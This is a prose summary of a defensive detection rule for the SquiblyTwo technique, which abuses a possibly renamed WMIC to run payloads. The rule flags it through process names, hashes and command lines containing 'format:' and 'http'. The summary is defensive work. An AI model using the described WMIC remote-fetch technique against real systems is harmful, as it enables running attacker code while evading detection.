This detection rule identifies potential execution of the SquiblyTwo technique, which involves leveraging WMIC (Windows Management Instrumentation Command-line) for malicious purposes. Specifically, the rule targets scenarios where WMIC may have been renamed or configured in a manner to evade detection mechanisms. It does so by analyzing the process creation logs for Windows, particularly checking for filenames, image hashes, and command line inputs that align with known behaviors associated with the SquiblyTwo execution strategy. The detection leverages the 'Image', 'OriginalFileName', and 'Hashes' attributes from the PE (Portable Executable) file characteristics, focusing on specific hashes that have been documented as part of the technique's signature. Furthermore, command line invocations that include certain keywords like "format:" and "http" are also monitored to supplement the identification framework. The rule incorporates a comprehensive approach to catch various execution vectors and configurations that an attacker might utilize to execute their malicious payloads while attempting to remain undetected.